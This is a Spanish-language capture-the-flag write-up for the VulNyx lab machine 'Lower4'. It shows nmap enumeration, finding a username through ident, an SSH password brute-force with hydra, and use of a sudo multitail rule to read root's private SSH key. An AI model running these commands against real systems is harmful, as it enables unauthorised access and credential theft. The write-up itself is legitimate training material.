cd ~/blog

~/writeups/vulnyx/31-lower4.md

31 - Lower4

low Linux vulnyx 08-11-2025
ident user disclosureWeak SSH Passwordsudo multitail arbitrary file read
vulnyx.com

~1 min de lectura


Identificamos la IP de la máquina víctima:

 arp-scan --interface=wlan0 --localnet | grep PCS | awk '{print $1}'
10.207.245.21

Enumeramos puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 10.207.245.21
[sudo] contraseña para wh01s17:
Starting Nmap 7.98 ( https://nmap.org ) at 2025-11-08 14:03 -0300
Nmap scan report for 10.207.245.21
Host is up (0.00026s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
113/tcp open  ident
MAC Address: 08:00:27:C3:7B:A8 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.15 seconds
 nmap -sCV -p 22,80,113 -oN 02-targeted.txt 10.207.245.21
Starting Nmap 7.98 ( https://nmap.org ) at 2025-11-08 14:04 -0300
Nmap scan report for 10.207.245.21
Host is up (0.00029s latency).

PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
|_auth-owners: root
80/tcp  open  http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Apache2 Debian Default Page: It works
113/tcp open  ident?
|_auth-owners: lucifer
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.50 seconds

El servicio ident (puerto 113) revela el propietario de los sockets; el script auth-owners de nmap nos descubre directamente el usuario lucifer. Con ese usuario hacemos fuerza bruta contra SSH:

 hydra -l 'lucifer' -P ~/Documents/wordlists/rockyou.txt 10.207.245.21 ssh -t 64
...
[22][ssh] host: 10.207.245.21   login: lucifer   password: 789456123
...

Nos logueamos con lucifer:789456123 y obtenemos la primera flag:

 ssh lucifer@10.207.245.21
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
lucifer@10.207.245.21's password: 789456123
lucifer@lower4:~$

Para escalar privilegios, revisamos los permisos sudo:

lucifer@lower4:~$ sudo -l
Matching Defaults entries for lucifer on lower4:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lucifer may run the following commands on lower4:
    (root) NOPASSWD: /usr/bin/multitail

Podemos ejecutar multitail como root. Esta herramienta permite leer ficheros, así que la usamos como lector arbitrario para volcar la clave privada SSH de root:

lucifer@lower4:~$ sudo multitail /root/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----

Copiamos la clave a nuestra máquina y nos conectamos como root:

 chmod 600 id_rsa_root
 ssh root@10.207.245.21 -i id_rsa_root
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
root@lower4:~#

Obtenemos la flag y fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados